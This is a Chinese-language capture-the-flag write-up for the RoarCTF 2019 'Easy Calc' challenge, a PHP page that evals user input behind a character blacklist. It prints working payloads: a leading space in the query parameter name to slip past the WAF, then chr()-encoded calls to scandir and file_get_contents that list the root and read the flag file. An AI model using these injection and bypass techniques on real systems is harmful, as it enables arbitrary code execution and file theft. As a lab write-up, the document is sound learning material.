[RoarCTF 2019]Easy Calc

f12找到一段ajax请求代码

    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })

进入calc.php

 <?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

关键点在eval函数这里，明显是代码执行。

我本以为这就是题目中所说的waf，结果输了字母也被禁掉了。

看来还有防护手段。这题使用率php字符串解析特性。

什么是字符串解析特性呢：

PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：
1.删除空白符  
2.将某些字符转换为下划线（包括空格）【当waf不让你过的时候，php却可以让你过】

所以说我们将变量num改为 num（在前面加了个空格），waf认为这俩不是一个变量，不会对其进行防护，

但是后台php在解析的时候，会先去掉空格，这样我们的php代码就能够执行了。

? num=phpinfo()

 

 绕waf成功。

接下来就是绕这个后台检测了。先列一下根目录吧，flag一般都放在根目录。

? num=1;var_dump(scandir(chr(47)))

chr(47)绕过'/'检测。

目录是f1agg不是flagg，做题可要看清楚1和l。

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

最后得到flag